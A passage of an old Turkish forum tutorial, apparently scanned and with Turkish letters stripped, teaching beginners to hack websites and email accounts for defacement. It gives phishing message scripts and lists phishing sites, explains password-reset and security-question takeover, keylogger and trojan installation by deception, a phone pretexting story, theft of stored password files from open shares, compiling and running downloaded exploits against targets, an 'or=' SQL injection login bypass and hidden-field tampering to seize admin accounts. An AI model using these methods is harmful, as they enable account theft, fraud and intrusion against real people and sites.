You are on page 1of 99

YEN BALAYANLARA GEN HACKING ANLATIMI // 1.

BLM Deerli arkadalar, forumlardaki bilgilerin derlenmesi ve basite indirgenerek yazlmas gerektiine inanyordum. Bunun iin aratrdm, bu srada kendim de gelitim. imdi, yeni balayanlarn anlayabilecei dzeyde, geni aklamal & ierikli bir dkman olmas iin bunu yazyorum. Sfrdan balayan arkadalar iin ok faydal, "vasat" arkadalarn da iinde ufak detaylar bulabileceini dndm bir dkman... Umarm faydal olurum. Bu anlatmlarda, pratikten ziyade teorik bilgi vermek durumundaym ama, teoriyi olduka geni tuttuum iin pratik yapmanz kolaylaacak inAllah. Bunun yannda rendiklerinizi misyon dahilinde faaliyete geirmeniz iin almanz gerekiyor. Anlatlanlar pratie geirirken karlatnz soru(n)lar buraya veya bal bana atnz bir forum konusuna yazarsanz yardmc oluruz... Veya MSNM gibi iletiim programlaryla da kafanza taklanlar "usta"larmza sorabilirsiniz. Bu kadar nutuktan sonra, balayalm... Web sitelerini hacklemek iin kullanlan iki yntem vardr, domain ve host hack. Domain sitelerin adresidir, hosting ise siz sitenin adresini yazdnzda ynlendiiniz bilgisayardr, yani sitenin ierisindeki tm dosyalar barndran bilgisayarlar... rneklendirecek olursak www.Cyber-boys.com bir domaindir. Fakat bu sitede bulunan tm dosyalar, bir hosting firmasnn bilgisayarlar iindedir. Siz adres barnza http://www.Cyber-boys.com yazdnzda, Cyber-boys.com undosyalarnn bulunduu bilgisayara ynlenirsiniz. Bir sitenin domainini hacklediinizde, o domaini sizin "hacked by xxx" yazan sayfanza ynlendirirsiniz ve bu ekilde siteyi hacklemi olursunuz. Hosting hackte ise, direkt olarak sitenin ieriini deitirir, Admin kullancsnn ayarlar ile oynar, ynlendirme ile filn uramazsnz. imdi yntemlerden bahsedeyim... Mail-hack: Domain hack iin kullanlan en nemli yntemlerden birisi mail hacktir. nce www.arama.com/domain.php3 gibi adresleri kullanarak hedefimizdeki siteye whois ekeriz (Whois ekeriz dedim de kafanz karmasn; sadece verdiim adrese gidip karnza kan kutucua hedefteki sitenin ismini girip ilgili dmeye tklamanz yeterli ) ) ve orada admin mail veya technical contact gibi ksmlarda yazan mail adresini hackleriz. Daha sonra bu whois bilgilerinde yazan domain veya host firmasna (ns1.xxx.com, ns2.xxx.com, veya register through yazan yerlerden kopya ekebilirsiniz, birazck ngilizceyle olay anlayabilirsiniz zaten) hacklediimiz adresten mail atarz ve deriz ki: "ifremi unuttum, siteme giri yapamyorum. Yani size rahatszlk vermek istemem ama u ifremi, grm olduunuz bu maile atar msnz?". Eer size direkt olarak ifreyi yollamak yerine "Dur bakalm birader... Senin adn, yan, eklin emalin, yani bize kayt olurken kullandn bilgilerini bir gnder bize ki, senin o sitenin sahibi olduuna inanalm ve sana ifreyi yollayalm. Ne malum senin siteyi hacklemeyecein?" gibi bir cevap gelirse, whois bilgilerinin arasnda bulunan admin-name, admin-city gibi bilgileri derleyin, yle bir kalba oturtun ve sizden ye olurken kullandnz bilgilerinizi isteyen irkete yollayn... Hacklemek istediiniz sitenin domain veya host irketi (genelde ayn irket olurlar) size ifreyi yollayacak... Veya hi mail yazmakla uramadan, domain irketinin sitesine girersiniz ve orada online olarak ifrenizi yolladklar "ifremi Unuttum!" gibi bir link varsa oray kullanrsnz. Onlarda size ifreyi yollar... Eer ifre gelirse, bu ifreyi sitenin FTPsinde de deneyerek sonuca ulaabilirsiniz (belki, nk kullanc ad da lazm FTPlerde ve bu ok deiik kelimeler olabilir, siteadi.com olmayabilir kullanc adlar byk ihtimalle! En iyisi manuel olarak muhtemel kullanc isimlerini denemek veya finger ekmek -ki uzun itir finger ekmek, konu dalmasn. O yzden burada yazmyorum nasl yapldn, ilerleyen blmlerde yeri gelince ksaca deineceim.-...) veya domain irketini kullanarak, domaini iinde "Hacked by xxx" yazan bir adrese ynlendirebilirsiniz...)

Tabii bu anlattklarm iin, ncelikle mail-hackten biraz anlamanz gerekiyor. O yzden size u anda hatrladm birka mail-hack yntemini yazaym: 1. Fake mail: Tecrbesiz kullanclarn maillerini almak iin bire bir. Kurbana bir anonymous mail (Anonymous Mail=Belli bir mail adresinizin olmas gerekmeden atabildiiniz, kimlik bilgilerinizi tamayan maillerdir denebilir) yollayan (aenima mail bomber gibi ou mailbomber bu ii yapabiliyor) bir program veya bir fake mail/anonymous mail sitesi (mesela anonymous mail hizmeti www.anonymouse.ws adresinde var) kullanarak fake mail atabilirsiniz. Direkt olarak fake kodunu HTML eklinde kendi elinizle yazabilirsiniz, ama "bununla uraamam" derseniz hazr fake kodlarn ve fake mail sitelerini kullanabilirsiniz. Tam yeri gelmiken syleyeyim arkadalar, Hacking ile uraacaksanz en azndan HTMLi bari bilin. Hazr fake kodlarn veya fake sitelerini de kullanabilirsiniz ama emin olun ki hi bir kod sizinkinden gzel olamaz!.. Sadece Fakede deil, her konuda lzm HTML... Bunu renin en azndan... . Ayrca Fake sitelerinden bazlarn biraz aada veriyorum. ncelikle, fake mailin mant nedir? Fake mailde, adama kulland mail account irketinden, veya -daha kesin sonu alabilirsiniz- adamn ye olduu herhangi bir portaldan bir mail atyormu ve onun ifresine ihtiya duyuyormu gibi davranyorsunuz. rnein adama members@yahoo.com adresinden mail atyormu gibi gsteriyorsunuz (farkl bir mailden geliyormu izlenimi verme zellii hemen hemen tm fake mail sitelerinde veya anonymous mail programlarnda vardr), ve onun size yollad ifresi sizin belirttiiniz mail adresine geliyor, yani sizin mailinize. Mesel siz Mynet yneticisisiniz, "bir kullanc sizin siteniz hakknda bir ikayette bulundu, inceleme yapacaz" dersiniz ve "kullanc ad", "parola" ve bir de "sitenizin ksa tanm" balkl 3 adet kutu gsterirsiniz. Formu kendi mail adresinize ynlendirirsiniz. Adam ifreyi yazp gnder dmesine bast an ifreyi siz alrsnz. Veya ne bilim, adama "yelik aktivasyonu" balyla bir mail atarsnz ve adamn yeliinin aktifliinin korunabilmesi iin size kullanc ad ve ifresini gndermesini syleyebilirsiniz. Onun ye olduunu bildiiniz bir web sitesinin admini olarak ona mail atarsnz ve dersiniz ki "Sitemiz yeniden yaplanma ierisine girmitir. Kullanlmayan hesaplar sebebiyle hem irketimiz zor durumda kalmakta, hem de size verdiimiz hizmetlerde aksamalar grlmektedir. Eer sitemizi kullanmaya devam etmek istiyorsanz kullanc adnz ve ifrenizi aadaki kutulara girin (/aadaki linkteki forma yazn)...." vs. diyebilirsiniz. Veyahutta... nce kurbana sama sapan birka adet mail atarsnz(mail-bomb yaparsnz) mesela "ERROAR 0013e5B" gibi sama sapan bir ierii olur. Sonra adamn mail ald irketin yelik hizmetkr olarak bir mail atar ve dersiniz ki: "yelik hesabnzda bir problem kt, yeliinizi yeniden yaplandrmamz iin bize kullanc ad ve ifrenizi yollayn." Bunun gibi yalanlarla adamn ifresini istiyorsunuz ve adam sizin kendi mail adresinize veya hazrladnz Fake scriptine ynlenmi olan forma ifresini gnderdii an, artk size kalan ifre ve kullanc adn mail sitesinin login ksmna girip maili hackledikten sonra, kullanc ifresi ve gizli soru gibi eitli bilgileri deitirmek... Ve ardndan, hi vakit geirmeden host veya domain irketinden ifreyi istemek. Bu arada atlanmamas gereken bir konu var ki, baz siteler HTML hlinde gnderilen mailleri biimlendirmiyor, kodlar gsteriyor (Mynet). Bunu atlatabilmek iin stratejik bir site alyorsunuz (mesela uyelikservisi.sitemynet.com gibi -mynet iin inandrc olur bu tabii ki-) ve attnz mailde diyorsunuz ki: "aadaki linke tklayn ve bize u u u sebepten dolay yollamanz gereken bilgilerinizi gnderin." Aadaki linkin bulunduu siteye siz fake kodunu atyorsunuz ve sonuta mail sizin. Fake sonularnn size ulaabilmesi iin kendi fake servisinizi de kurabilirsiniz. Mesela cretsiz asp hostu veren websamba.com gibi bir yerden site alrsnz, bedava ASP destekli adresinize, sonra da paketteki hazr HTML kodunu veya kendi yazdnz kodu

<form action="..." ksmndaki yeri deitirip mesel <form action="http://www.websamba.com/Websamba daki_Kullanici_Adiniz/kayit.asp" eklinde ayarlarsanz, sonu alrsnz. Veya hi uramadan da hazr fake sitelerini kullanabilirsiniz... Bir ka tanesi: http://members.lycos.co.uk/pcsever/fake www.siberkorsan.net/fake/index.php www.hademeler.netteyim.net/fakemail.htm http://members.lycos.co.uk/lenogin/index.php?sys=tur1 http://members.lycos.co.uk/hacktim/index.php www10.brinkster.com/Dostturk/fake.htm www.kingsoffalcons.com/fake/index.php www.nailkaplan.tr.cx http://members.lycos.co.uk/adminnet/index.php?sys=tur1 Fake konusu biraz da sizin yaratclnza bal... Temel olarak mant yukardaki gibi... Tabii ki fake atarken kullanlan dilin resm ve nazik olmas nemli. Bunun yannda sonuna "Mynet A..", "Hotmail", "Yahoo! Member Services" gibi eyler yazarsanz daha inandrc olur. Lkin Doktora gnderilen fake(!)deki gibi "sayglarmzla yahoo a.." yazarsanz millet sadece sizinle dalga geer...) Bu arada, fakeinizde adamn mailinin alnm olduu irketin srekli kulland logosuna, resimlerine, linklerine de mailiniz ierisinde yer verirseniz daha inandrc olur... ("Acaba onu Nas yapacam?" demeyin, hi olmazsa HTMLi renin be arkadalar! Tabii ki <img> ve <a> etiketleriyle)) 2. Gizli soru tahmini: Eer ansnz varsa en zahmetsiz ve risksiz yntem diyebilirim. Bilirsiniz ki ou mail irketi ye olurken "ifreni unutursan girer ve ifreni deitirirsin" dncesiyle bir gizli soru ve cevap belirlemenizi isterler sizden... Ve baz kullanclar gizli sorular ve cevaplarn basit seerler: "adn ne", "en sevdiin iecek ne" vs. te byle durumlarda ya atmasyon yaparsnz, ya da adamla dostane bir ekilde irtibat kurar, bir sre konutuktan sonra aktrmadan gizli sorusunda sakl olan bilgiyi sorar ve renirsiniz. Sonra da mailini alrsnz ve ifreyle birlikte gizli soruyu da deitirip mailin sizin elinizde devaml kalmasn salarsnz. Hotmailde gizli soruya ulamak iin aadaki adresteki, xxx@hotmail.com ile gsterilen yere kullaniciadi@hotmail.com veya kullaniciadi@msn.com yazarak adamn gizli sorusuna ulaabilirsiniz, eer maili alan kimse lke seilen blmde Trkiyeyi setiyse. Eer Trkiye seili deilse -tpk benim mailimdeki gibi-, sizden bir eyalet veya baka bir lke semenizi isteyecektir hotmail. Eer adam kayt olurken Amerikay setiyse yandnz, nk lke+eyalet+posta kodunu doru girmeniz gerekiyorki bu da imknsz. Neyse ben URLyi veriyorum: https://memberservicesnet.passport....com&xcountry=TR Mynette ise Mynet Brutus programn kullanabilirsiniz. lk versiyonda bazen atlayabiliyor, ama ikinci versiyonu sadece Windows XPde alt iin deneyemedim -yalnz herkes sorunsuz altn sylyor-. Bu program kullanarak adamn doum tarihini buluyorsunuz, sonra Mynete gidip gizli soruya ulamaya altnzda "doum tarihini girmeden geemezsin!" dedii zaman brutusle rendiimiz doum tarihini giriyor ve gizli soruya ulayoruz. Sonras, sizin yaratclnza kalm bir ey... Allah yardm etsin... Yahoo!da ise "forgot password"le hi uramayn, arasnda postal codeun da olduu bir

takm bilgileri girmeniz gerekiyor. Bu da sallamayla tutturulacak bir ey olmadna gre,...... 3. Database Hack: Bir siteye ye olurken kulland ifreyi, mail, hatta web sitesi ifresi olarak kullanan insanlar %85lik bir orana sahiptir nereden baksanz. Eer elinize bir ekilde bir sitenin databasei geerse, adamn ifresini ve mail adresini oradan renir, sonra da gider mail adresi zerinde o ifreyi denersiniz. Muhtemelen hacklersiniz!.. Buradan, oraya-buraya ye olurken mail/FTP/internet account ifrelerimizi kullanmamamz gerektiini de kartm olmalsnz. Ayrca Database hack ksmna ikinci derste deineceim. 4. Keylogger programlar: Casus programlar olarakta adlandrlan bu keyloggerlarn mant udur: Bir bilgisayarda yaplan ilemleri, baslan tular ifreleyip sizin mailinize daha nceden belirlediiniz zaman aralklaryla rapor etmesidir. Adam bilgisayarn kullanrken arada bir, -mail/FTP/internet account dahil- herhangi bir platformdaki yelik hesabna girmek iin kullanc ad ve ifresini kullanacandan ve bu bilgilerde size rapor edilenler arasnda bulunacandan, aldnz ifreyi kullanmak yoluyla adamn mail ve sitelerini hacklemek ans elinize geecek. Amma.... Bunu yapmanz nermem; nk bu yntemle alacanz mailler genellikle zararsz, kendi hlinde, masum kimselerin olacaktr. Eer okulda veya herhangi bir internet kafede kafay taktnz, mutlaka mailini veya sitesini almak istediiniz birisi varsa, bu programlar onun bilgisayarna kurun/kandrarak kurdurun ve onun bilgilerini kullann. Masumlara dokunmayn!.. Bu programlarn isimlerini aratrarak bulabilirsiniz ama XPCSpy ve Invisible Keylogger isimli programlarn iyi keylogging yaptn duymutum. Serial falan isterlerse crackfind.com gibi crack arama motorlarn kullanarak seriallarna ulaabilirsiniz. Bu arada bu tip keyloggerlar hedef bilgisayara siz kuruyorsanz una dikkat edin; keyloggerlar kurarken size "nereye kuraym?" dediinde "crogram filesaccessoriesHyperTerminal" gibi kimsenin bakmak aklna gelmeyecek yerlere kurun ve eer varsa balattaki, masastndeki program ksayollarn kaldrn ki, bulunmaas ok zorlasn... 5. Chat Ortamnda ifre stemek: Evet, bu tip insanlarda var. Yani kz taklidi yapyorsunuz, birkata resim atyorsunuz, sonra biraz nazlanarak mail ifresini istiyorsunuz. Verme ihtimali var, elence/mizah/geyik blmnde byle bir olayn rneine rastlayabilirsiniz!) 6. Trojan: Adamn mail adresine veya MSNM gibi dosya paylam yaplan ortamlarda bu Truva Atlarn yolluyorsunuz. Kurban bu programlar bilgisayarna kabul edip altrd zaman (server.exe genelde), bilgisayar baz portlarda ak oluturuyor ve sizin bilgisayarnzdaki ana program vastasyla bu portlar kullanarak hedefteki bilgisayara balanyorsunuz, o bilgisayar sizin kontrolnz altna giriyor. sterseniz tm ifrelerine el koyabilir, isterseniz de sistemine eitli zararlar verebilirsiniz. Keyloggerlar devreye sokabilir, kurbanla chat yapabilir, ona mesajnz gsterebilir, CD-Romunu amak gibi oyunlar oynayabilir, aklnza gelmeyen pek ok ey yapabilirsiniz... Ama bizim derdimiz kesinlikle adamn bilgisayarna zarar vermek deil, ifrelerine ulamak (bilgi paylam ) ). ou trojanda otomatik olarak "ifreleri getir" anlamna gelen ilevler / keylogger sistemleri olur ve siz

bunlar aktif hale getirdiinizde kurbann ifrelerine sahip olursunuz. Yalnz ok bilinen trojanlarn byk bir blm anti-virslerce de bilindii iin, kandrdnz adamn antivirs feryad-u figna balad an (hele carsperskynin bir bar varki evlere enlik ) aklaban olursunuz. Yani bu tip dezavantajlar da var. Bunun iin bilinmeyen ve yeni km, taptaze, smscak programlar kullanmak her zaman iin daha iyi sonularla karlamanza sebeptir. Ve baz trojanlarn kullanmlar birbirini tutmuyor, aslnda mantk ayn olsa da. Siz elinizdeki asl programla (client.exe) server.exe gibi bir programck oluturur ve bunu kar tarafn bilgisayarnda altrmasn 8 gzle beklersiniz... Veya karnn IP numarasn trojandaki ilgili yere yazp aklardan ieri dalabilirsiniz (R3X mant)... Aklma gelen birka trojan: SubSeven, ProRat (Trke), Turkojan (Trke), Pro Aigent, netbus, schoolbus... Fakat bilinmeyen trojanlarn kullanm daha iyidir... 7. Saksy altrmak: "imdi bu ne demek istemi?" diyen birileri kacaktr eminim... Evet benim ok dikkatimi ekti ve gerekten ok beendim bunu... Farinelli abinin forumlarda yazd bir mesajn aynen aaya alyorum... Mesaj Yazan: farinelli 15 Kasm 2003 saat 18:02 - Kaytl IP arkadalar ben en son hacklediim siteyi anlatmak istiyorum... Ki sadece programlama bilmek yetmiyor anlalsn... www.XXXXX.com adresine whois ektim... domain.comdan. Adamn her trl bilgisi gerekti... Yahoo maili brakm... Denedim doum tarihi v.s gerekliydi ne yaptm biliyormusunuz... bilinmeyen numaralar aradm... stanbul/avrupa yakasnda X mahallesinin muhtarnn telefonunu aldm.. (adamn adresine kadar herey gerekti). Muhtarn alanlarnndan birine sert bir ses tonuyla.. ben keller partisinden aryorum dedim (ok ciddiyim) buyrun dedi... Bir genel kurul yemizin kaytlar iin teyid almam gerekiyor dedim... Arada bir "tamam bakanm buldum" dedim... Adamn adresini adn hereyini, yant vermeden nce ben saydm... Kadn ard... bana sadece doum tarihi lazm dedim...Verdi... Sonras malum... Domain.coma ifremi unuttum dedim... Maili verdim bir baktm ki mailde parl parl parlyor ifre... te size bir hack hikayesi.... ___________________________________________ Nasl ama???)) Gelitirilebilecek, daha akl banda bir hle getirilebilecek, pek ok bilgiye ulamamza yardmc olabilecek, zekice bir i... (Olayn gereklii tartlabilir ama ben fikir vermesi asndan aldm bunu, ki farinelli abim yalan sylemez ). Demekki neymiiii? Hack sadece teknikle yaplmazm!... Saksda lazmm!... 8. Reset Password zellii (hotmail vs.) Hotmailde ifremi unuttum diyorsunuz ve karnza gelen reset password linkini kullanarak iletiim formuna ulayorsunuz. Bu forma kurbann kiisel bilgilerini yazyorsunuz ve en sonunda da diyorsunuz ki "ifremi ve gizli cevabm unuttum/birisi mailimi hacklemi, bir zahmet size belirttiim mail adresime bunu yollar msnz?". Tabii ki formda size ulalabilinmesi iin bir mail adresi yazlacak kutucuk var, oraya kendi mail adresinizi yazyorsunuz. Ama burada una dikkat edin; mesel hacklemeyi dndnz mail ebruzkiran@hotmail.com sa, siz ncelikle email.com, mynet.com,

matrixportal.com gibi bele mail veren yerlerden ayn isimde bir mail aln ve o kutucua onu yazn ki, inandrclnz artsn. Yani rnee gre yazabileceiniz bir adres ebruzkiran@email.com ... ifreniz gelince de gidip hemen maili hackliyorsunuz. Tabii ki reset password formuna girdiiniz tm bilgilerin doru olmas gerek ifrenin gelmesi iin... 9. Paylama ak bilgisayarlar smrmek: R3X, Hound, Hallet, essential Net Tools gibi programlar kullanarak nce bir IP araln taratyoruz, sonra da kan paylama ak bilgisayarlara -programn zelliine bal olarak- ya girip Windows dizini altndaki PWL dosyalarn, program filesglobalscapecuteFTP dizinindeki sm.dat veya smdata.dat dosyalarn ekiyoruz, ya da programn "ifreleri getir" veya "keylogger" gibi bir ilevi varsa onu kullanarak ifreleri elde ediyoruz. PWLTools gibi programlarla elde ettiimiz dosyalarn iindeki ifreyi kryoruz, sonras ise PWLlerden elde ettiiniz ifreleri mail veya FTP hesabnda denemenize kalm... (Eer FTP ifresini aldysanz -.DAT dosyalar ile- zaten FTP ifresi elinizde, gidin hackleyin.) Aslnda bunu trojan balnda da yazabilirdim ama farkl bir konu... Mail hack konusunda hatrlayabildiklerim bu kadar... Arkadalar, yeri gelmiken... freeserverstan alnm siteleri hacklemek iin nce adamn mailini hackliyorsunuz ve sonra ****************a gidip "ifremi unuttum" diyorsunuz ve oraya adamn mail adresini yazyorsunuz. Tm ifreler geliyor. Toplu katliyam ans... . Peki 8m, 8k, 4t, s5 ... ksacas freeservers sitelerinin sahiplerinin kullandklar maillere nasl ulaacaz? Bunu renmek iin aadaki adreste, xxx.xxx.com yazan yere, siteadi.8m.com gibi Site_ad.freeservers_uzants.son_uzant eklinde adresi yazacaksnz ve to: blmnde yazan mail adresini hacklemek iin alacaksnz. URL: http://xxx.xxx.com/cgi-bin/emailme Ve bir not... Eer bir site MUTLAKA AMA MUTLAKA hacklenmeliyse, whois ekip sitenin "son kullanm" tarihini renirsiniz. O tarihte bakarsnz, eer webmaster henz siteyi almadysa domain i siz alrsnz.. Bylece adam farkl bir domain almaya zorlar, sitenin ziyareti potansiyelini byk lde drrsnz... Evet arkadalar, ilk "anlatm"n sonuna geldik. Anlamadnz her eyi sorabilirsiniz. Yaknda ikinci blm de yaynlayacam inAllah. imdilik bu kadar, birka gn sonra II. blmde bulumak zere...

Buyrun Geni HACKERLK anlatm


cenlikle mrb arkadalar ben forumtr ilk geldiim gnden beni Web Hack ksm ile ilgilendim bende hackerlik yapmak istedim ama reteneniz olmad bende kendim buldum google den siz bana retmediniz ama ben renemk isteyen lere veriyorum sayglar. GEN HACK ANLATIMI

Exploit meselesiyle balayalm... Hack konusu iinde ok byk bir nemi olan Exploitlar en ince detayna kadar anlatmam mmkn deil, ama size mantn ve konu hakknda baz noktalar anlatacam. (Konuyla ilgili herey anlatlabilecek olsayd, forumlarda "exploits/vulnerabilities" diye bal-bana bir topic olur muydu?...). Aslnda hacklenen sitelerin byk bir blmnn bu yntemle indirildiini syleyen arkadalar da yok deil. Ben buna ok da inanmamakla beraber, baarl ve "uzun mrl" bir "defacer" olmak isteyenlerin mutlaka ilgilenmeleri gereken bir konu olduunu dnyorum bu konunun. Neyse... Konuya geelim... Exploitlar sayesinde bir sitede veya bir hosting bilgisayarnda en yetkili kii olmak mmkn. Amac bu. Sizi o sitede veya serverda en yetkili kii (ynetici) yapmak. En yetkili kii olunca da, o site veya serverdaki tm siteler konusunda her istediinizi yapabilirsiniz. Exploitlar local ve remote olmak zere iki ekilde yazlr. Local exploitlar kullanabilmek iin o hosting firmasnda sizin de bir hesabnzn -yani bir sitenizin- olmas gerekir. Local exploitlarla serverdaki sitelerin hepsini hackleyebilirsiniz. Remote exploitlar kullanabilmek iin serverda bir hesabnzn olmas gerekmez, kendi bilgisayarnzda exploitu altrabilirsiniz. Tm server deil, tek siteyi deface edersiniz... Aralarndaki fark bu... Exploitlar genelde derlenmesi gereken kodlardr. Bazen, nadiren de olsa online altrabileceiniz exploitlarda bulabilirsiniz. Mesel aada verdiim exploit, online olarak altrlabilir ve sizi PHP-Nuke 6.5 ile yaplm sitelerde admin yapar. Link: http://packetstormsecurity.nl/0310-...hp-nuke.6.5.php Fakat ou exploit yukarda verdiim gibi online olarak, bir siteden altrlamaz. Bunlar iin nce hosting bilgisayarnn, yani servern hangi iletim sistemini kullandn renmelisiniz. Bunun iin www.netcraft.com sitesine gidip sol st ksmdaki yere sitenin ismini yazarsnz. search dediiniz zaman sitenin hangi iletim sistemi zerinde altn renirsiniz. Daha sonra da bu sistemin exploitunu bulur, siteyi hacklersiniz. letim sistemlerine gre exploitlar, exploit portal olarak adlandrabileceim www.packetstormsecurity.nl , www.phreak.org/html/exploits.shtml ve hack.co.za gibi adreslerden bulup indirirsiniz veya googleda iletim_sisteminin_ad exploit eklinde aramalar yaparak istediiniz exploitu ekebilirsiniz. unu da hatrlataym; sizi bir sistemde en yetkili kii yapan exploit, farkl sistemde ie yaramaz. Sz gelimi bir linux exploitu windows NTde i grmez... Exploitlar genelde .C veya .PL uzantldr, bazlar ise ok az da olsa online altrlabilir PHP dosyalardr, yukardaki rnekteki gibi... nce ilgili exploitu bilgisayarmza download ediyoruz. Exploitun uzants .c ise bunu shellde derlememiz lazm. Shell nedir? Shell hesab aldnzda srekli ve hzl bir net balants olan bir makinede, linux komutlar altrabileceiniz bir yeriniz olur. Biraz web sitesi mantna benziyor. Web sitelerinde

bir hosting alrsnz ve buraya dosyalar upload edebilirsiniz, Shellde ise aldnz yerde Linux komutlar altrabilirsiniz. Aralarnda byle bir benzerlik ve fark var. Tabii Shelli daha da geni anlatmak mmkn ama biz de zaten Shellin Linux komutu altrma zelliinden faydalanarak exploitlar derleyeceiz. Nette bedava shelller var, fakat bu shelllerin iimize yaramas ok zor. nk ierikleri geni tutulmaz bunlarn... O yzden paral shell alnmas veya bilgisayarnza Linux kurulmas gerekebilir (veya bir arkadanzdan Shell hesab bulabiliyorsanz bulun derim).

Varsayalm ki bir yerden iimize yarayabilecek, salam altyapl bir shell temin ettik. Bunlarla exploitlarmz yle derleriz: ncelikle indirdiimiz exploit dosyasn -ismini deitirmeden- bir web sitesine atyoruz, Mynet, Websamba vs. olabilir. Sonra Shell hesabmza Putty programn kullanarak balanyoruz. Bu programn amac ksaca Shell kurulu bilgisayarlara balanmaktr -Hani web sitelerinin FTPsine ulamak iin CuteFTP gibi programlar kullanyoruz ya, bunu da bir nevi buna benzetebilirsiniz.-. Shelle balandktan sonra, u komutu yazyoruz: wget http://exploit u_attiginiz_site/exploit_adi.c Bu komutla shell exploitu bnyesine ekecektir. Dosyann ekilip ekilmediini ls yazarak kan dosya listesinden exploitun ismini grrseniz anlarsnz, ekilmi demektir. Daha sonra unu yazmalsnz: gcc -o exploit exploit.c Burada shell, exploit.c dosyasn derleyecek ve derlenmi hlinin adn exploit yapacaktr. Daha sonra bu exploit dosyasn: ./exploit yazarak altrabilirsiniz. Bunu yazdnzda, karnza gelecek ekranda Exploitun nasl kullanlacan anlatan yazlarla karlaacaksnz. Bu ekran da okuyarak exploitun nasl altrlacan renebilirsiniz ama, genelde exploitlar: ./exploit -h hacklenecek_site veya... ./exploit -i Hacklenecek_sitenin_IPsi yazarak altrlr. Burada yanl anlalma olmasn, ./ iaretlerinden sonra exploitun ismini yazacaz. Sz gelimi exploitumuzun ad exp.c ise, gcc -o exp exp.c ve sonra da ./exp -h xxx gibi kullanmalsnz. Bu arada server sahibi exploitun nlemini aldysa ie yaramazlar, tabii ki. imdi de ok ksa olarak PERLde exploit derlemekten bahsedelim... .PL uzantl exploitleri derleyebilmek iin ncelikle Active PERL programn download etmelisiniz. Link: http://aspn.activestate.com/ASPN/Downloads/ActivePerl/ Buradaki program download ettikten sonra kuruyoruz. Kurulumu yarda kesmeyin. Biraz

uzun srebilir. Kurulum bittikten sonra, hacklenecek sitenin hostunda kurulu olan sistemi reniyoruz ve exploitunu buluyoruz. Sonra bu exploitu c erl in klasrne kopyalyoruz. Bunu altrmak iin, MS-Dos Komut stemini ayoruz ve orada c erl in klasrne geiyoruz. ("Nasl geeceim?" gibi bir soruyu kabul etmiyorum . Hi yoktan birazck Dos temeliniz olsun arkadalar. Bilgisayardan hi akmayan arkadalarn bu konularla uramas ne denli dorudur, bilmiyorum.) Ama hadi yazaym yine de: MS-DOS Komut stemini atnzda, sizi otomatikmen C:windows klasrne atar. Burada cd..perl in yazp enterlayn. Bu komutla o klasr aabilirsiniz. Buray atktan sonra Perl hazr hle geliyor. Burada, unu yazarak exploitumuzu kullanlr hle getiririz: perl exploit.pl -h www.kurban.com Enterlandnda, kurban servern aklar kapanmamsa, sitede en yetkili kii olursunuz. Devam ise exploitun zelliklerine bal. Exploitunuz nelere izin veriyorsa, onlar yapabilirsiniz. Allah yardmcnz olsun . Exploit konusunda anlatacaklarm bu kadar. Baz arkadalar belki anlamamlardr ama bata da sylediim gibi anlatlmas, programlama dillerinin mantndan ve shell, linux gibi konulardan bhaber arkadalar iin ok zor. Fakat yukardaki blmn size yine de bir mantk vermi, bir eyler anlatm olmas gerekir diye dnyorum. Kafanza taklanlar sorarsanz -ben dahil- yardmc olacak pek ok arkada kacaktr emin olun... Hack yntemlerinden birisi de ASP ve PHP gibi dillerin aklarndan faydalanmak. Bu aklar sizi genelde Administrator seviyesine ykselten aklar... Siteye Admin olarak girdiinizde de zaten istediinizi sistemden atn, istediinizin ifresini aln, hatta sitenin ortasna "HaCKeD BY XXX" yazn... Bu tip aklara biraz rnek vermek gerekirse: or= a: nlemi alnmamsa sizi administrator seviyesine ykselten bir ak. yelik sistemli ASP sitelerinde geerli. Aslnda sitede bir admin giri yeri varsa ama bu sitenin direkt olarak anasayfasndan ulalamyorsa, yani indexte "admin girii" diye bir yer grnmyorsa, ncelikle site zerinde manuel denemeler yapmalsnz. rnein sitead/admin.asp , siteadi/login.asp , siteadi/forum/admin.asp , /admin/admin.asp, /admin/login.asp vs... Eer tutturamazsanz, google.coma gidip: admin site: siteAd.com eklinde bir arama yaparsanz, google sizin iin sitede admin kelimesi geen tm sayfalar gsterecektir. Bunun dnda, aspindir.com gibi hazr kod sitelerinden download ettiiniz scriptleri incelerseniz, admin panelinin nerede tutulduunu renebilirsiniz. inize yarayabilir. Bu bilgiden sonra, an nasl kullanlacan da ksaca yazalm. Kullanc ad/ifre girii isteyen bir sitenin, bu bilgileri gireceimiz formuna ulan (login form) ve aadakileri ilgili kutuya yazn : Kullanc ad: or= ifre: or= Her iki kutucua da ayn eyi yazyoruz ve ansmz varsa sitede "hoppala" admin oluyoruz! Formlardaki type="Hidden" deerini smrmek: Genelde ASP destekli yelik sistemleri zerinde alan sitelerdeki bir ak. *Yasak Kelime* abi, *Yasak Kelime*hackerken bu konuda uzun bir dkman yazmt ("inputlar ve veri dorulama" isminde), onu

zetlemek istiyorum. ncelikle yelik sistemli bir siteye ye oluyoruz. Sonra kullanc admz kullanarak login oluyoruz. ou sitede login olduktan sonra "bilgilerimi dzenle", "profil dzenle" vs. linkler olur ve bu blmden kii kendine ait pek ok bilgisini, hatta kullanc ad ve ifresini bile deitirebilir. te "profilimi dzenle" anlamna gelen linke tklyoruz ve sonra karmza bir form geliyor. Hemen "kayna grntle" diyoruz ve karmza aadaki gibi bir form kaynak kodu geliyor: <form action="guncelle.asp" method="post"> <input type="hidden" name="islenecekkullaniciadi" value="eski_kullanici_adiniz_burada_yaziyor_olmali"> <br>Kullanc ad: <input type="text" name="yenikullaniciadi" value="eski_kullanici_adiniz_burada_da_yaziyor_ama_degist irilebilir"> <br>ifreniz: <input type="password" name="yenisifre" value="Burada_sifreniz_yaziyor_olmali"> ..... <input type="submit" value="Bilgilerimi Gncelle" </form> Bu formda, action=".." ksmnda belirtilen dosya form bilgilerini gncelleyecek olan dosyadr. <input type="hidden" yazan yerdeki kullanc admz, type="submit" deerinde belirttiimiz "Bilgilerimi Gncelle" dmesine basldnda actionda belirttiimiz guncelle.asp dosyas tarafndan deitirilecek. type="text satr ekrana bir kutucuk kartr ve bu rnekte bizden oraya yeni kullanc admzn girilmesi isteniyor. type="Password" de ise yine ekrana bir kutucuk kar ve bunun iine yazlan herey **** eklinde grnr, ifredir nk. imdi, tekrarlayalm; rnekteki hiddenda zerinde oynama yaplacak kullanc ad, textte yeni kullanc ad, ve passwordde de deitirilebilir ifre yazyor... O zaman, biz hidden="..." blmne "administrator"n sitede kulland nickini yazarsak, ne olur??? Adminin ismini, cismini, mail adresini, en nemlisi de kullanc ad ve de ifresini deitirebiliriz!.. Kayna Grntle dediimiz sayfann kodlarn kopyala/yaptrla not defterine atalm ve ilk nce action=".." daki ksmn bana -eer 